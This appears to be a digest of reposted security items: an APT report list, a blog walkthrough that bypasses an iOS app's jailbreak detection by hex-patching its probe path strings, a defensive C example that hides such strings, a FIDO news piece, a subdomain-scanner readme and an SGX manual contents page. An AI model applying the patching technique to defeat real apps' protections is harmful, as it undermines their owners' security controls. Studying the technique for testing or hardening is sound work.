Apr 20 - Stuxnet Under the Microscope
Aug ?? - Shady RAT
Aug 04 - Operation Shady RAT
Aug 02 - Operation Shady rat : Vanity
Aug 03 - HTran and the Advanced Persistent Threat
Sep 09 - The RSA Hack
Sep 11 - SK Hack by an Advanced Persistent Threat
Sep 22 - The "LURID" Downloader
Oct 12 - Alleged APT Intrusion Set: "1.php" Group
Oct 26 - Duqu Trojan Questions and Answers
Oct 31 - The Nitro Attacks: Stealing Secrets from the Chemical Industry
Dec 08 - Palebot trojan harvests Palestinian online credentials

2012
Jan 03 - The HeartBeat APT
Feb 03 - Command and Control in the Fifth Domain
Feb 29 - The Sin Digoo Affair
Mar 12 - Crouching Tiger, Hidden Dragon, Stolen Data
Mar 13 - Reversing DarkComet RAT's crypto
Mar 26 - Luckycat Redux
Apr 10 - Anatomy of a Gh0st RAT
Apr 16 - OSX.SabPub & Confirmed Mac APT attacks
May 18 - Analysis of Flamer C&C Server
May 22 - IXESHEA An APT Campaign
May 31 - sKyWIper (Flame/Flamer)
Jul 10 - Advanced Social Engineering for the Distribution of LURK Malware
Jul 11 - Wired article on DarkComet creator
Jul 27 - The Madi Campaign
Aug 09 - Gauss: Abnormal Distribution
Sep 06 - The Elderwood Project
Sep 07 - IEXPLORE RAT
Sep 12 - The VOHO Campaign: An in depth analysis
Sep 18 - The Mirage Campaign
Oct 08 - Matasano notes on DarkComet, Bandook, CyberGate and Xtreme RAT
Oct 27 - Trojan.Taidoor: Targeting Think Tanks
Nov 01 - RECOVERING FROM SHAMOON
Nov 03 - Systematic cyber attacks against Israeli and Palestinian targets going on for a year

2013
Jan 14 - The Red October Campaign
Jan 14 - Red October Diplomatic Cyber Attacks Investigation
Jan 18 - Operation Red October
Feb 12 - Targeted cyber attacks: examples and challenges ahead
Feb 18 - Mandiant APT1 Report
Feb 22 - Comment Crew: Indicators of Compromise
Feb 26 - Stuxnet 0.5: The Missing Link
Feb 27 - The MiniDuke Mystery: PDF 0-day Government Spy Assembler 0x29A Micro Backdoor
Feb 27 - Miniduke: Indicators v1
Mar 13 - You Only Click Twice: FinFisher's Global Proliferation
Mar 17 - Safe: A Targeted Threat
Mar 20 - Dissecting Operation Troy
Mar 20 - The TeamSpy Crew Attacks
Mar 21 - Darkseoul/Jokra Analysis And Recovery
Mar 27 - APT1: technical backstage (Terminator/Fakem RAT)
Mar 28 - TR-12 - Analysis of a PlugX malware variant used for targeted attacks
Apr 01 - Trojan.APT.BaneChant
Apr 13 - "Winnti" More than just a game
Apr 24 - Operation Hangover
May ?? - Operation Hangover
May 30 - TR-14 - Analysis of a stage 3 Miniduke malware sample
Jun ?? - The Chinese Malware Complexes: The Maudi Surveillance Operation
Jun 01 - Crude Faux: An analysis of cyber conflict within the oil & gas industries
Jun 04 - The NetTraveller (aka 'Travnet')
Jun 07 - KeyBoy, Targeted Attacks against Vietnam and India
Jun 18 - Trojan.APT.Seinup Hitting ASEAN
Jun 21 - A Call to Harm: New Malware Attacks Target the Syrian Opposition
Jun 28 - njRAT Uncovered
Jul 09 - Dark Seoul Cyber Attack: Could it be worse?
Jul 15 - PlugX revisited: "Smoaler"
Jul 31 - Secrets of the Comfoo Masters
Jul 31 - Blackhat: In-Depth Analysis of Escalated APT Attacks (Lstudio, Elirks)
Aug ?? - Operation Hangover - Unveiling an Indian Cyberattack Infrastructure
Aug ?? - APT Attacks on Indian Cyber Space
Aug 02 - Where There is Smoke, There is Fire: South Asian Cyber Espionage Heats Up
Aug 02 - Surtr: Malware Family Targeting the Tibetan Community
Aug 19 - ByeBye Shell and the targeting of Pakistan
Aug 21 - POISON IVY: Assessing Damage and Extracting Intelligence
Aug 23 - Operation Molerats: Middle East Cyber Attacks Using Poison Ivy
Sep ?? - Feature: EvilGrab Campaign Targets Diplomatic Agencies
Sep 11 - The "Kimsuky" Operation
Sep 13 - Operation DeputyDog: Zero-Day (CVE-2013-3893) Attack Against Japanese Targets
Sep 17 - Hidden Lynx - Professional Hackers for Hire
Sep 25 - The 'ICEFROG' APT: A Tale of cloak and three daggers
Sep 30 - World War C: State of affairs in the APT world
Oct 24 - Terminator RAT or FakeM RAT
Nov 10 - Operation Ephemeral Hydra: IE Zero-Day Linked to DeputyDog Uses Diskless Method
Nov 11 - Supply Chain Analysis
Dec 02 - njRAT, The Saga Continues
Dec 11 - Operation "Ke3chang"
Dec 20 - ETSO APT Attacks Analysis
??? ?? - Deep Panda
??? ?? - Detecting and Defeating the China Chopper Web Shell

2014
Jan 06 - PlugX: some uncovered points
Jan 13 - Targeted attacks against the Energy Sector
Jan 14 - The Icefog APT Hits US Targets With Java Backdoor
Jan 15 - New CDTO: A Sneakernet Trojan Solution
Jan 21 - Shell_Crew (Deep Panda)
Jan 31 - Intruder File Report - Sneakernet Trojan
Feb 11 - Unveiling "Careto" - The Masked APT
Feb 13 - Operation SnowMan: DeputyDog Actor Compromises US Veterans of Foreign Wars Website
Feb 19 - The Monju Incident
Feb 19 - XtremeRAT: Nuisance or Threat?
Feb 20 - Operation GreedyWonk: Multiple Economic and Foreign Policy Sites Compromised, Serving Up Flash Zero-Day Exploit
Feb 20 - Mo' Shells Mo' Problems - Deep Panda Web Shells
Feb 23 - Gathering in the Middle East, Operation STTEAM
Feb 28 - Uroburos: Highly complex espionage software with Russian roots
Mar 06 - The Siesta Campaign
Mar 07 - Snake Campaign & Cyber Espionage Toolkit
Mar 08 - Russian spyware Turla
Apr 26 - CVE-2014-1776: Operation Clandestine Fox
May 13 - Operation Saffron Rose (aka Flying Kitten)
May 13 - CrowdStrike's report on Flying Kitten
May 20 - Miniduke Twitter C&C
May 21 - RAT in jar: A phishing campaign using Unrecom
Jun 06 - Illuminating The Etumbot APT Backdoor (APT12)
Jun 09 - Putter Panda
Jun 20 - Embassy of Greece Beijing
Jun 30 - Dragonfly: Cyberespionage Attacks Against Energy Suppliers
Jun 10 - Anatomy of the Attack: Zombie Zero
Jul 07 - Deep Pandas
Jul 10 - TR-25 Analysis - Turla / Pfinet / Snake / Uroburos
Jul 11 - Pitty Tiger
Jul 20 - Sayad (Flying Kitten) Analysis & IOCs
Jul 31 - Energetic Bear/Crouching Yeti
Jul 31 - Energetic Bear/Crouching Yeti Appendix
Aug 04 - Sidewinder Targeted Attack Against Android
Aug 05 - Operation Arachnophobia
Aug 06 - Operation Poisoned Hurricane
Aug 07 - The Epic Turla Operation Appendix
Aug 12 - New York Times Attackers Evolve Quickly (Aumlib/Ixeshe/APT12)
Aug 13 - A Look at Targeted Attacks Through the Lense of an NGO
Aug 18 - The Syrian Malware House of Cards
Aug 20 - El Machete
Aug 25 - Vietnam APT Campaign
Aug 27 - NetTraveler APT Gets a Makeover for 10th Birthday
Aug 27 - North Korea's cyber threat landscape
Aug 28 - Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks
Aug 29 - Syrian Malware Team Uses BlackWorm for Attacks
Sep 03 - Darwin's Favorite APT Group (APT12)
Sep 04 - Forced to Adapt: XSLCmd Backdoor Now on OS X
Sep 08 - Targeted Threat Index: Characterizing and Quantifying Politically-Motivated Targeted Malware (video)
Sep 08 - When Governments Hack Opponents: A Look at Actors and Technology (video)
Sep 10 - Operation Quantum Entanglement
Sep 17 - Chinese intrusions into key defense contractors
Sep 18 - COSMICDUKE: Cosmu with a twist of MiniDuke
Sep 19 - Watering Hole Attacks using Poison Ivy by "th3bug" group
Sep 23 -
Sep 26 - Aided Frame, Aided Direction (Sunshop Digital Quartermaster)
Sep 26 - BlackEnergy & Quedagh
Oct 03 - New indicators for APT group Nitro
Oct 09 - Democracy in Hong Kong Under Attack
Oct 14 - ZoxPNG Preliminary Analysis
Oct 14 - Hikit Preliminary Analysis
Oct 14 - Derusbi Preliminary Analysis
Oct 14 - Group 72 (Axiom)
Oct 14 - Sandworm - CVE-2104-4114
Oct 20 - OrcaRAT - A whale of a tale
Oct 22 - Operation Pawn Storm: The Red in SEDNIT
Oct 22 - Sofacy Phishing by PWC
Oct 23 - Modified Tor Binaries
Oct 24 - LeoUncia and OrcaRat
Oct 27 - Full Disclosure of Havex Trojans - ICS Havex backdoors
Oct 27 - ScanBox framework: who's affected, and who's using it?
Oct 28 - APT28 - A Window Into Russia's Cyber Espionage Operations
Oct 28 - Group 72, Opening the ZxShell
Oct 30 - The Rotten Tomato Campaign
Oct 31 - Operation TooHash
Nov 03 - New observations on BlackEnergy2 APT activity
Nov 03 - Operation Poisoned Handover: Unveiling Ties Between APT Activity in Hong Kong's Pro-Democracy Movement
Nov 10 - The Darkhotel APT - A Story of Unusual Hospitality
Nov 11 - The Uroburos case - Agent.BTZ's successor, ComRAT
Nov 12 - Korplug military targeted attacks: Afghanistan & Tajikistan
Nov 13 - Operation CloudyOmega: Ichitaro 0-day targeting Japan
Nov 14 - OnionDuke: APT Attacks Via the Tor Network
Nov 14 - Roaming Tiger (Slides)
Nov 21 - Operation Double Tap | IOCs
Nov 23 - Symantec's report on Regin
Nov 24 - Kaspersky's report on The Regin Platform
Nov 24 - TheIntercept's report on The Regin Platform
Nov 24 - Deep Panda Uses Sakula Malware
Nov 30 - FIN4: Stealing Insider Information for an Advantage in Stock Trading?
Dec 02 - Operation Cleaver | IOCs
Dec 03 - Operation Cleaver: The Notepad Files
Dec 08 - The 'Penquin' Turla
Dec 09 - The Inception Framework
Dec 10 - Cloud Atlas: RedOctober APT
Dec 10 - W32/Regin, Stage #1
Dec 10 - W64/Regin, Stage #1
Dec 10 - South Korea MBR Wiper
Dec 12 - Vinself now with steganography
Dec 12 - Bots, Machines, and the Matrix
Dec 17 - Wiper Malware: A Detection Deep Dive
Dec 18 - Malware Attack Targeting Syrian ISIS Critics
Dec 19 - TA14-353A: Targeted Destructive Malware (wiper)
Dec 21 - Operation Poisoned Helmand
Dec 22 - Anunak: APT against financial institutions

2015
Jan 11 - Hong Kong SWC attack
Jan 12 - Skeleton Key Malware Analysis
Jan 15 - Evolution of Agent.BTZ to ComRAT
Jan 20 - Analysis of Project Cobra
Jan 20 - Reversing the Inception APT malware
Jan 22 - The Waterbug attack group
Jan 22 - Scarab attackers Russian targets | IOCs
Jan 22 - Regin's Hopscotch and Legspin
Jan 27 - Comparing the Regin module 50251 and the "Qwerty" keylogger
Jan 29 - Backdoor.Winnti attackers and Trojan.Skelky
Jan 29 - Analysis of PlugX Variant - P2P PlugX
Feb 02 - Behind the Syrian Conflict's Digital Frontlines
Feb 04 - Pawn Storm Update: iOS Espionage App Found
Feb 10 - CrowdStrike Global Threat Intel Report for 2014
Feb 16 - Equation: The Death Star of Malware Galaxy
Feb 16 - The Carbanak APT
Feb 16 - Operation Arid Viper
Feb 17 - Desert Falcons APT

Sursa: https://github.com/kbandla/APTnotes
17. a trivial iOS jailbreak detection bypass

introduction

Not too long ago, I toyed with an Android root detection bypass. In a similar scenario, I was poking at an iOS application that also had some root detection built in. For very much the same purpose, I suppose the application has its own ~reasons~ for the jailbreak detection. Of course, this makes the testing I actually wanted to do impossible, as I'd very much like to dig under the hood. So, it was time to try and bypass the jailbreak detection of the application.

All I had to work with was a .ipa. Similar to the Android .apk file, the .ipa is also just a zipped-up archive of the actual application files. To test with, I had an iPad mini. The iPad was running the latest iOS (8.1.2 at the time of this post) and was also jailbroken. If I remember correctly, the jailbreak tool used was called TaiG. Anyways, inside the application's .ipa archive was a whole bunch of resource files and whatnot, including the compiled application executable. This executable is what is of interest.

understanding the behavior

I installed the app onto my iPad and started to inspect its behavior. When the application starts, it immediately throws a security-related error, notifying the user that it has detected the environment as one that is jailbroken. This happens pretty fast too. Once the jailbreak detection error shows, the application refuses to continue to run. Restarting the application simply continues this loop.

I studied some iOS jailbreak detection methods online, which revealed many of them as being pretty obvious: from detecting the presence of /bin/bash or Cydia.app, to examining the exit status of fork(). There are some more advanced methods as well, such as checking for the existence of certain known dylibs (which apparently is the hardest to circumvent). For the purpose of this post, the jailbreak detection was pretty weak and did not have any of the more advanced methods implemented. In fact, I am pretty sure there won't be that many apps out there that will be this easy to bypass.

discovering the implementation

Armed with some knowledge of how it's typically done in the iOS world, I proceeded to take a look at the actual application binary:

    leonjza@laptop » file myApplication
    myApplication: Mach-O executable arm

Compiled as a Mach-O executable from Objective-C, I loaded up the binary from the extracted .ipa into the Hopper disassembler to help me get an idea of what is happening. Hopper has some nice features such as generating pseudo code, etc., so I quite like using it for these types of excursions.

To start off, I searched around for strings that were related to the word jailbreak within the app. Class definitions, methods or any strings related to the term jailbreak were fine; I just wanted to get something to start off with. I found nothing. Of course this had me thinking that I may have missed the plot entirely. I continued to search for other things related to jailbreaking, and got a hit immediately for the term /bin/bash in the string section. In fact, there are quite a few other jailbreak-related strings in this section. From within Hopper, one can check where these strings are referenced from. So, I followed this and landed up in a function that does what I would have expected a jailbreak detection function to do, but with a completely unexpected class/method name: -[MobileDisplay isRetinaDisplay]. Very sneaky.

So we are working with the isRetinaDisplay method, which is the one doing the jailbreak detection. As can be seen in the above screenshot, the fileExistsAtPath for /Applications/Cydia.app is hardly something I would have expected in an isRetinaDisplay implementation.

planning an attack

At this stage, I was fairly certain that I had found the code I was looking for. From the method name isRetinaDisplay, I reasoned a little and guessed that this was actually supposed to say isJailBroken. I want this method to return false. My mind went straight to getting cycript ready for some method swizzling. I started to set things up and played around a little, when I realized that I don't think I will be able to manipulate the runtime fast enough for this to work. Remember, the first thing the app does is check the jailbreak status. After a bit of thinking, a few coffees, special alone time with Google and lots of reading, I came to realize that even if I was able to get this method swizzling to work, I'd have to do this every time the application starts up. This was not going to work for me. It was time to rethink my strategy.

Considering how the jailbreak detection works, most of the ways that I saw in the application were related to file existence checks. There was also an attempt to write to /private/jailbreak.txt, as well as to open a cydia:// url. I realized that I could probably just change these strings to things that will inherently fail and cause the method to not return true for any of the checks.

in 1992 we had hex editors too

I ssh'd into my iPad and located the application's installed directory. Once I had found this, I scp'd the compiled binary to my kali linux install and opened it in a hex editor. I realized later I could have probably just used the binary I already had locally. Referencing the disassembly of isRetinaDisplay, I searched for the strings it used using the hex editor. In each string I would replace a few characters with 0, ensuring that I kept the original string length intact. For example, /bin/bash was replaced with /bin/ba00.

I ended up editing the following strings using the hex editor:

    /Applications/Cydia.app -> /Applications/Cyd00.app
    /Library/MobileSubstrate/MobileSubstrate.dylib -> /Library/MobileSubstrate/MobileSubstra00.dylib
    /bin/bash -> /bin/ba00
    /usr/sbin/sshd -> /usr/sbin/ss00
    /etc/apt -> /etc/a00
    /private/jailbreak.txt -> /0000000/0000000000000
    cydia://package/com.example.package -> cyd00://package/com.example.package

I saved the modifications that I had done, and scp'd the binary back to my iPad, to the folder where it was installed. I literally just overwrote the existing binary. At this stage I figured I would most certainly have some form of signing-related problem, as the binary had been tampered with. Well, this was not the case. Instead, I was no longer greeted with the lame jailbreak security error.

summary

In the end, it was pretty easy to find the jailbreak detection code. Deducing a few things based on the disassembly made it easy to find the method responsible for the checks, regardless of the attempt to hide it via a name change. Furthermore, using something as simple as a hex editor, a trivial implementation such as this was very easily bypassed.

Posted by Leon Jacobs Feb 20th, 2015 bypass, hex, ios, jailbreak

Sursa: https://leonjza.github.io/blog/2015/02/20/a-trivial-ios-jailbreak-detection-bypass/
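The detection above was found and defeated because its probe paths sat in the binary as plaintext, so a string search located them and a hex editor patched them in place. As an added example from the app developer's side (not code from the original post), this C program keeps the probe paths XOR-encoded at rest and decodes them only transiently, so neither a strings dump nor a search for "/bin/bash" finds them; the function names, the key 0x5A and the encoded tables are constructed for this demonstration, and the existence probe is injectable so the logic can be exercised off-device.

```c
/* Added example: obfuscated-at-rest probe paths for a jailbreak check.
 * Constructed for this page; not the application's or the post's code.
 * Caveat in the spirit of the post: this only hides the strings from a
 * casual search. Verifying the binary's own integrity at launch is the
 * control that would have caught the overwritten executable. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define OBF_KEY 0x5A  /* constructed demo key; a real build would vary it per build */

/* Decode an XOR-encoded path into out (NUL-terminated). Returns the
 * decoded length, or 0 when the buffer is too small. Length is carried
 * explicitly because a path byte equal to the key encodes to 0x00. */
static size_t decode_path(const uint8_t *enc, size_t len, char *out, size_t out_size) {
    if (len + 1 > out_size) return 0;
    for (size_t i = 0; i < len; i++) out[i] = (char)(enc[i] ^ OBF_KEY);
    out[len] = '\0';
    return len;
}

/* Build-time helper: produce the encoded table for a new probe path. */
static size_t encode_path(const char *path, uint8_t *out, size_t out_size) {
    size_t n = strlen(path);
    if (n == 0 || n > out_size) return 0;
    for (size_t i = 0; i < n; i++) out[i] = (uint8_t)path[i] ^ OBF_KEY;
    return n;
}

/* Wipe a decoded buffer so the plaintext path does not linger in memory. */
static void scrub(char *buf, size_t n) {
    volatile char *p = buf;
    while (n--) *p++ = 0;
}

/* Encoded forms of two of the paths the post lists (key 0x5A, computed by hand). */
static const uint8_t P_CYDIA[] = { 0x75, 0x1B, 0x2A, 0x2A, 0x36, 0x33, 0x39, 0x3B,
                                   0x2E, 0x33, 0x35, 0x34, 0x29, 0x75, 0x19, 0x23,
                                   0x3E, 0x33, 0x3B, 0x74, 0x3B, 0x2A, 0x2A };
static const uint8_t P_BASH[]  = { 0x75, 0x38, 0x33, 0x34, 0x75, 0x38, 0x3B, 0x29, 0x32 };

struct probe { const uint8_t *enc; size_t len; };
static const struct probe PROBES[] = {
    { P_CYDIA, sizeof P_CYDIA },   /* /Applications/Cydia.app */
    { P_BASH,  sizeof P_BASH  },   /* /bin/bash */
};
#define NPROBES (sizeof PROBES / sizeof PROBES[0])

/* The existence probe is a callback so the logic can be tested without a device. */
typedef int (*exists_fn)(const char *path);
static int path_exists(const char *path) { return access(path, F_OK) == 0; }

/* Constructed test fixtures: one host where only /bin/bash exists, one with nothing. */
static int fake_exists_bash_only(const char *path) { return strcmp(path, "/bin/bash") == 0; }
static int fake_exists_none(const char *path) { (void)path; return 0; }

/* Decode each probe, ask whether it exists, scrub, and count the hits.
 * Each plaintext path lives only inside this frame for one call. */
static int count_indicators(exists_fn exists) {
    char buf[128];
    int hits = 0;
    for (size_t i = 0; i < NPROBES; i++) {
        if (decode_path(PROBES[i].enc, PROBES[i].len, buf, sizeof buf) == 0) continue;
        if (exists(buf)) hits++;
        scrub(buf, sizeof buf);
    }
    return hits;
}

/* Check that a stored table decodes to the expected plaintext. */
static int table_decodes_to(const struct probe *p, const char *expected) {
    char dec[128];
    if (decode_path(p->enc, p->len, dec, sizeof dec) != p->len) return 0;
    int ok = strcmp(dec, expected) == 0;
    scrub(dec, sizeof dec);
    return ok;
}

/* Encode then decode a path and report whether it survives the round trip. */
static int roundtrip_ok(const char *path) {
    uint8_t enc[128];
    char dec[128];
    size_t n = encode_path(path, enc, sizeof enc);
    if (n == 0 || decode_path(enc, n, dec, sizeof dec) != n) return 0;
    int ok = strcmp(dec, path) == 0;
    scrub(dec, sizeof dec);
    return ok;
}

int main(void) {
    uint8_t enc[128];
    size_t n = encode_path("/usr/sbin/sshd", enc, sizeof enc);
    printf("table for /usr/sbin/sshd (%zu bytes):", n);
    for (size_t i = 0; i < n; i++) printf(" 0x%02X", enc[i]);
    printf("\nself-test: tables=%d roundtrip=%d fixture=%d\n",
           table_decodes_to(&PROBES[0], "/Applications/Cydia.app") &&
           table_decodes_to(&PROBES[1], "/bin/bash"),
           roundtrip_ok("/private/jailbreak.txt"),
           count_indicators(fake_exists_bash_only) + count_indicators(fake_exists_none));
    printf("indicators present on this host: %d\n", count_indicators(path_exists));
    return 0;
}
```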
18. Windows 10 embraces password-killing biometric authentication

Ian Paul @ianpaul
Ian is an independent writer based in Tel Aviv, Israel. His current focus is on all things tech including mobile devices, desktop and laptop computers, software, social networks, Web apps, tech-related legislation and corporate tech news.

Microsoft is about to officially join the fight for authentication without pesky passwords. The company recently announced that Windows 10 will support the Fast Identity Online (FIDO) 2.0 specification. The end result is that instead of using passwords to log in to PCs, Microsoft services, and other third-party accounts, you'll also be able to use a fingerprint or eye scan—possibly integrated with a key fob for two-factor authentication.

In its blog post announcing FIDO in Windows 10, Microsoft focused largely on features that would interest IT types, such as FIDO support for major enterprise-focused cloud services including Office 365 Exchange Online, Salesforce, Citrix, and Box. But FIDO in Windows 10 will also work with consumer services such as Windows 10 sign-ins, Outlook.com, and OneDrive.

Why this matters: The call to kill passwords with a better authentication solution has been ongoing for some time. FIDO appears to be the best chance for a one-size-fits-all solution to password-less authentication. The FIDO Alliance includes many major tech companies and other businesses with a big interest in security, including Arm, Bank of America, Google, Lenovo, Mastercard, PayPal, and Visa. Microsoft joined the FIDO Alliance in late 2013. When heavy hitters work together on problems like this, the end result tends to be a near-universal solution—an absolute must if FIDO is to truly replace the password.

What is FIDO?

The idea behind FIDO isn't all that new. Instead of using passwords—which can be forgotten, lost, stolen, or even guessed—a FIDO-equipped device would use biometrics such as fingerprint and eye scans that are much harder to acquire. This initial login method could also be paired with a key fob for two-factor authentication for added security.

Biometric scanners have already been integrated into smartphones, laptops, and other devices for years. The difference with FIDO is that it's an open standard, meaning any company can implement it in their products or services. It also means that FIDO-compliant biometric scanners and two-factor authentication devices can be used with any FIDO-supporting service, as opposed to the hodgepodge of fingerprint-scanning security mechanisms we have now. The FIDO specifications are also designed so that a user's biometric data never leaves the device.

For anyone who wants to check it out, Microsoft says FIDO integration is already available in the Windows 10 Technical Preview for enterprise applications as well as Windows 10 sign-in.

Sursa: Windows 10 embraces password-killing biometric authentication | PCWorld
19. Knock Subdomain Scan v.3.0rc1

Knockpy is a python tool designed to enumerate subdomains on a target domain through a wordlist.

Usage

    knockpy [-h] [-v] [-w WORDLIST] [-r] [-z] domain

    positional arguments:
      domain           specific target domain, like domain.com

    optional arguments:
      -h, --help       show this help message and exit
      -v, --version    show program's version number and exit
      -w WORDLIST      specific path to wordlist file
      -r, --resolve    resolve ip or domain name
      -z, --zone       check for zone transfer

note: the ALIAS name is marked in yellow.

Example

subdomain scan with internal wordlist
    knockpy domain.com
subdomain scan with external wordlist
    knockpy domain.com -w wordlist.txt
resolve domain name and get response headers
    knockpy -r domain.com
check zone transfer for domain name
    knockpy -z domain.com

Install

from pypi (as root)
    pip install https://github.com/guelfoweb/knock/archive/knock3.zip
or manually, download the zip and extract the folder
    cd knock-knock3/
    (as root) python setup.py install

note: tested with python 2.7.6 | it is recommended to use Google DNS (8.8.8.8 | 8.8.4.4)

Talk about
Ethical Hacking and Penetration Testing Guide Book by Rafay Baloch

Other
This tool is currently maintained by Gianni 'guelfoweb' Amato, who can be contacted at guelfoweb@gmail.com or on twitter @guelfoweb. Suggestions and criticism are welcome.

Sponsored by Security Side

Sursa: https://github.com/guelfoweb/knock/tree/knock3
20. Software Guard Extensions

CHAPTER 1 INTRODUCTION TO SOFTWARE GUARD EXTENSIONS
1.1 Overview   1-1
1.2 Enclave Interaction and Protection   1-1
1.3 Enclave Life Cycle   1-2
1.4 Data Structures and Enclave Operation   1-2
1.5 Enclave Page Cache   1-2
1.5.1 Enclave Page Cache Map (EPCM)   1-3
1.6 Enclave Instructions and SGX   1-3
1.7 Discovering Support for SGX and enabling Enclave Instructions   1-4
1.7.1 SGX Opt-In Configuration   1-4
1.7.2 System Software Enabling of SGX   1-4
1.7.3 SGX Resource Enumeration Leaves   1-4

CHAPTER 2 ENCLAVE ACCESS CONTROL AND DATA STRUCTURES
2.1 Overview of Enclave Execution Environment   2-1
2.2 Terminology   2-1
2.3 Access-control Requirements   2-1
2.4 Segment-based Access Control   2-2
2.5 Page-based Access Control   2-2
2.5.1 Access-control for Accesses that Originate from non-SGX Instructions   2-2
2.5.2 Memory Accesses that Split across ELRANGE   2-2
2.5.3 Implicit vs. Explicit Accesses   2-2
2.5.3.1 Explicit Accesses   2-2
2.5.3.2 Implicit Accesses   2-3
2.6 SGX Data Structures   2-4
2.6.1 SGX Enclave Control Structure (SECS)   2-4
2.6.1.1 ATTRIBUTES   2-4
2.6.2 Thread Control Structure (TCS)   2-5
2.6.2.1 TCS.FLAGS   2-5
2.6.2.2 State Save Area Offset (OSSA)   2-5
2.6.2.3 Number of State Save Areas (NSSA)   2-5
2.6.2.4 Current State Save Area (CSSA)
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-5 2.6.3 State Save Area (SSA) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-6 2.6.3.1 EXITINFO . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-6 2.6.3.2 VECTOR Field Definition . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-7 2.6.4 Page Information (PAGEINFO) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-7 2.6.5 Security Information (SECINFO). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-7 2.6.5.1 SECINFO.FLAGS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-8 2.6.5.2 PAGE_TYPE Field Definition . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-8 2.6.6 Paging Crypto MetaData (PCMD). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-8 2.6.7 Enclave Signature Structure (SIGSTRUCT). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 
.2-9 2.6.8 EINIT Token Structure (EINITTOKEN) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-10 2.6.9 Report (REPORT) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-10 2.6.9.1 REPORTDATA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-11 2.6.10 Report Target Info (TARGETINFO) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-11 2.6.11 Key Request (KEYREQUEST) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-11 2.6.11.1 KEY REQUEST KeyNames . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-11 2.6.11.2 Key Request Policy Structure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-12 2.6.12 Version Array (VA) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-12 2.6.13 Enclave Page Cache Map (EPCM). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-12 CHAPTER 3 ENCLAVE OPERATION 3.1 Constructing an Enclave . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-1 3.1.1 EADD and EEXTEND Interaction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-2 3.1.2 EINIT Interaction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-2 3.2 Enclave Entry and Exiting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-3 3.2.1 Synchronous Entry and Exit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-3 iv Ref. #329298-001 3.2.2 Asynchronous Enclave Exit (AEX) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-3 3.2.3 Resuming Execution after AEX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-4 3.2.3.1 ERESUME Interaction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 